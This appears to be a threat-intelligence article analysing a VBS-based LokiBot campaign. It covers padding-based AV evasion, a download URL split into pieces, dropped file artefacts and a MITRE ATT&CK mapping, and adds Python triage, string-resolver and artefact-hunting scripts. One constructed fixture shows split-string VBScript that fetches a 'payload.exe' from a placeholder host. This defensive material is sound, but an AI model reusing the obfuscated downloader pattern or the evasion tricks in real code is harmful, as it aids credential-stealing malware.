Distribution of LokiBot
This article introduces the latest wave of the VBS-based LokiBot campaign and its subsequent analysis by LMNTRIX. One of the most prevalent malware families that the LMNTRIX CDC has recently seen is LokiBot. It targets hundreds of programs installed on the compromised system, including commonly used web browsers, email clients, and FTP clients, in order to steal sensitive information such as usernames, passwords, and cryptocurrency wallets.
Our technical analysis suggests that it was likely produced in one of the former USSR states (Russia, Ukraine, Kazakhstan, Tajikistan, or Belarus). The most recent LokiBot samples are propagated through malspam campaigns that encourage recipients to download infected attachments. The infection is spread through a wide range of methods, including Microsoft Office documents or script files designed to download and install additional malware payloads, and archive files containing an ISO image or a LokiBot executable.
The initial vectors may vary depending on the individual threat actor and their targets; threat actors typically perform basic reconnaissance of a targeted geography before choosing the infection vector.
Technical Analysis of Lokibot VBS Campaign
A VBS (Visual Basic Script) file is written in an interpreted scripting language and contains code that can be executed within Windows or Internet Explorer, via the Windows Script Host (Wscript.exe), to perform administrative and processing functions. Visual Basic for Applications (VBA) code can be included as part of the file's header and footer properties (Left-Header, Center-Header, Right-Header, Left-Footer, Center-Footer, and Right-Footer). This is very helpful for an analyst when analysing any script file or script-based malware.
Snap 1: Header Content
Our sample's header content consists of dotted elements. With tricks like this, can we analyse the sample adequately? Probably not. The malware author dupes the target into believing there is no hidden content inside the file. Let's examine the footer content of our sample, and then we can start our analysis.
Snap 2: Footer Content
The snapshot shown above was taken from the sample's footer content. This section also contains dotted elements (padding). Does that mean it is a legitimate file?
The embedded content was deftly placed in the centre of the file by the malware author; the main reason is to facilitate AV evasion, that is, to avoid detection by AV vendors. Observe the header's starting and ending lines: almost 2000 lines of padding. The author pads the file with dotted lines so that the malicious content sits hidden in its centre.
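The padding trick described above is easy to measure. The following triage script is an added example (not LMNTRIX's tooling or the sample's code): it counts the proportion of dotted padding lines in a script, flags files above an assumed threshold, and reports the line span where the real code sits, so the analyst can jump straight to it instead of scrolling past thousands of dots. The fixture is constructed, and it assumes the padding is written as VBScript comment lines, since bare dots would not parse.

```python
import re
from typing import List, Tuple

# Constructed fixture mimicking the layout the article describes: dotted
# padding in the header and footer with the real code buried in the middle.
# It is not the actual sample; the padding is written as VBScript comments
# (an assumption), since bare dots would not parse.
PAD_LINE = "'" + "." * 40
SAMPLE_VBS = "\n".join(
    [PAD_LINE] * 30
    + ["Dim s", 's = "hel" & "lo"', "MsgBox s"]
    + [PAD_LINE] * 30
)

# A padding line holds only whitespace, dots and an optional comment marker.
PADDING_RE = re.compile(r"^[\s'.]*$")


def is_padding(line: str) -> bool:
    return PADDING_RE.match(line) is not None


def padding_ratio(text: str) -> float:
    """Fraction of lines that are pure padding (0.0 for an empty file)."""
    lines = text.splitlines()
    if not lines:
        return 0.0
    return sum(is_padding(line) for line in lines) / len(lines)


def extract_payload(text: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, text) for every non-padding line."""
    return [(n, line) for n, line in enumerate(text.splitlines(), 1)
            if not is_padding(line)]


def triage(text: str, threshold: float = 0.8) -> dict:
    """Flag a script whose padding ratio meets `threshold` (an assumed cut-off)
    and report where the surviving code sits."""
    ratio = padding_ratio(text)
    payload = extract_payload(text)
    return {
        "padding_ratio": round(ratio, 3),
        "suspicious": ratio >= threshold and bool(payload),
        "payload_span": (payload[0][0], payload[-1][0]) if payload else None,
        "payload": "\n".join(line for _, line in payload),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBS)
    print(f"padding ratio {result['padding_ratio']}, "
          f"suspicious={result['suspicious']}, code at lines {result['payload_span']}")
    print(result["payload"])
```

The 0.8 threshold is a starting point: legitimate scripts rarely consist mostly of comment-only lines, but tune it against your own script corpus before using it as a detection.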
Snap 3: Middle content
Snap 4: Embedded Content
From the snapshot above, we can observe that a function inside the file is obfuscated. With additional analysis, we should be able to predict and replace the content exactly.
Snap 5: Embedded Content with URL
With further analysis, the LMNTRIX CDC is able to predict the multi-part URL and its declared functions. The URL is split into smaller parts and rejoined to avoid detection, another manoeuvre in every modern malware author's bag of tricks. Using the destination URL, the script downloads the payload file and stores it in the Windows %AppData% folder.
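Rejoining split strings by hand is tedious, and the step is mechanical enough to script. The following resolver is an added example, not part of the article or of the sample's code: it folds VBScript assignments that consist only of string literals, already-known variables and the `&` operator, and then searches the reconstructed values for URLs. Anything it cannot evaluate safely (function calls, arithmetic, unknown names) is skipped rather than guessed. The snippet it runs on is constructed in the style described above, with a reserved `.invalid` host.

```python
import re
from typing import Dict, List, Optional

# Constructed snippet in the style the article describes: a URL split into
# several string literals and variables, rejoined with "&" before use. This
# is an assumed pattern, not the sample's actual code; the host is reserved.
SAMPLE_SNIPPET = '''
Dim p1, p2, p3, dl
p1 = "htt" & "p://"
p2 = "exam" & "ple.inv" & "alid/"
p3 = "pay" & "load.e" & "xe"
dl = p1 & p2 & p3
Set xh = CreateObject("MSXML2.XMLHTTP")
xh.Open "GET", dl, False
'''

# name = expression   (also "Set name = ...")
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# An expression made only of string literals, identifiers and the & operator.
_ATOM = r'"(?:[^"]|"")*"|[A-Za-z_]\w*'
CONCAT_EXPR_RE = re.compile(rf'^\s*(?:{_ATOM})(?:\s*&\s*(?:{_ATOM}))*\s*$')
ATOM_RE = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)


def eval_concat(expr: str, env: Dict[str, str]) -> Optional[str]:
    """Evaluate a pure concatenation expression against known variables.
    Returns None if the expression uses anything else, so only safely
    reconstructible strings are recorded."""
    if not CONCAT_EXPR_RE.match(expr):
        return None
    parts: List[str] = []
    for literal, ident in ATOM_RE.findall(expr):
        if ident:
            if ident not in env:
                return None
            parts.append(env[ident])
        else:
            parts.append(literal.replace('""', '"'))  # VBScript escapes " as ""
    return "".join(parts)


def resolve_strings(script: str) -> Dict[str, str]:
    """Single pass over the script, folding every resolvable assignment."""
    env: Dict[str, str] = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        value = eval_concat(m.group(2), env)
        if value is not None:
            env[m.group(1)] = value
    return env


def extract_urls(script: str) -> List[str]:
    """URLs that only appear once the split pieces are rejoined."""
    env = resolve_strings(script)
    return sorted({url for value in env.values() for url in URL_RE.findall(value)})


if __name__ == "__main__":
    for name, value in resolve_strings(SAMPLE_SNIPPET).items():
        print(f"{name} = {value!r}")
    print("URLs:", extract_urls(SAMPLE_SNIPPET))
```

The resolver is deliberately conservative: a single pass in source order handles the common "declare pieces, then join" layout, while samples that build strings with `Chr()`, `Replace()` or loops still need a sandbox run or manual work.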
Snap 6: Threat Identifiers
Snap 7: Initial – Indicators of Compromise [IOC]
This is a common LokiBot IOC that has been in use for a long period. Using this URL, the malware connects to the threat actor's C2 server.
Once the system is infected, Lokibot will perform the following actions:
- Collecting information about the compromised host.
- Password stealing (from browser history and cookies).
- Targeting web banking links (web injects).
- Password brute forcing.
- Registry manipulation (persistence).
- Replicating its copies.
- Process injection to conceal the malicious action.
Appendix A – LokiBot Components
These are the files (file artefacts) that may be hidden within the Windows %APPDATA% directory at any given point in time. LMNTRIX has outlined the functions of the files dropped by the LokiBot campaign:
| File Extension | File Description |
| --- | --- |
| .exe | An executable copy of the malware that runs each time the user account logs in |
| .hdb | Database of hashes for data that has already been exfiltrated to the threat actor's C2 server |
| .kdb | Database of keylogging data that has yet to be sent to the C2 server |
| .lck | A lock file created when either decrypting Windows credentials or keylogging, to prevent resource conflicts on Windows |
| .vbs | Staged shellcode or malicious loader that executes functions of the LokiBot campaign |
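The extension set above is a usable hunting signal on its own. The following script is an added example (not LMNTRIX's tooling) that walks a directory tree, for instance an offline copy of a user's %APPDATA%, and reports every directory holding two or more files with these extensions. Requiring co-located hits is an assumption of the example, since a lone .exe is unremarkable; the fixture directory names are made up.

```python
import os
import tempfile
from collections import defaultdict
from pathlib import Path
from typing import Dict, List

# Extensions that Appendix A attributes to LokiBot's dropped files.
LOKIBOT_EXTS = {".exe", ".hdb", ".kdb", ".lck", ".vbs"}


def find_artifact_clusters(root: str, min_hits: int = 2) -> Dict[str, List[str]]:
    """Walk `root` and report every directory that holds at least `min_hits`
    files with the listed extensions. The cut-off of two is an assumption of
    this example, not something the article states."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if Path(name).suffix.lower() in LOKIBOT_EXTS:
                hits[dirpath].append(name)
    return {d: sorted(f) for d, f in hits.items() if len(f) >= min_hits}


def build_demo_tree(base: str) -> None:
    """Constructed fixture: one directory with the .exe/.hdb/.kdb/.lck set
    (names are made up) beside a benign-looking one with a single .exe."""
    suspect = Path(base) / "Roaming" / "A1B2C3"
    suspect.mkdir(parents=True)
    for ext in (".exe", ".hdb", ".kdb", ".lck"):
        (suspect / f"A1B2C3{ext}").write_bytes(b"")
    benign = Path(base) / "Roaming" / "SomeApp"
    benign.mkdir(parents=True)
    (benign / "SomeApp.exe").write_bytes(b"")
    (benign / "settings.ini").write_bytes(b"")


def demo() -> Dict[str, List[str]]:
    """Run the hunt over the fixture; keys are POSIX-style paths relative to it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        clusters = find_artifact_clusters(tmp)
        return {Path(d).relative_to(tmp).as_posix(): files
                for d, files in clusters.items()}


if __name__ == "__main__":
    for directory, files in demo().items():
        print(f"{directory}: {', '.join(files)}")
```

On a live host, pair the directory hit with the persistence check: a flagged .exe that also appears in a Run key or scheduled task matches the behaviour the table describes.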
Appendix B – Indicators of Compromise for LokiBot
MITRE ATT&CK Mapping for Loki Bot
According to MITRE, LokiBot uses the following tactics, techniques and procedures:
| Tactics/Techniques (TTP) | Malware Function |
| --- | --- |
| System Network Configuration Discovery [T1016] | LokiBot has the ability to discover the domain name of the infected host. |
| Obfuscated Files or Information [T1027] | LokiBot has encoded strings with base64 encoding. |
| Obfuscated Files or Information: Software Packing [T1027.002] | LokiBot has used several packing methods for obfuscation. |
| System Owner/User Discovery [T1033] | LokiBot has the ability to discover the system information and username on the infected host. |
| Exfiltration Over C2 Channel [T1041] | LokiBot has the ability to initiate contact with command and control to exfiltrate stolen data. |
| Process Injection: Process Hollowing [T1055.012] | LokiBot has used process hollowing to inject into the legitimate Windows process vbc.exe. |
| Input Capture: Keylogging [T1056.001] | LokiBot has the ability to capture input on the compromised host via keylogging. |
| Application Layer Protocol: Web Protocols [T1071.001] | LokiBot has used Hypertext Transfer Protocol for command and control. |
| System Information Discovery [T1082] | LokiBot has the ability to discover the computer name and Windows product name/version. |
| User Execution: Malicious File [T1204.002] | LokiBot has been executed through malicious documents contained in spear phishing email. |
| Credentials from Password Stores [T1555] | LokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients. |
| Credentials from Password Stores: Credentials from Web Browsers [T1555.003] | LokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers. |
| Hide Artifacts: Hidden Files and Directories [T1564.001] | LokiBot has the ability to copy itself to a hidden file and directory. |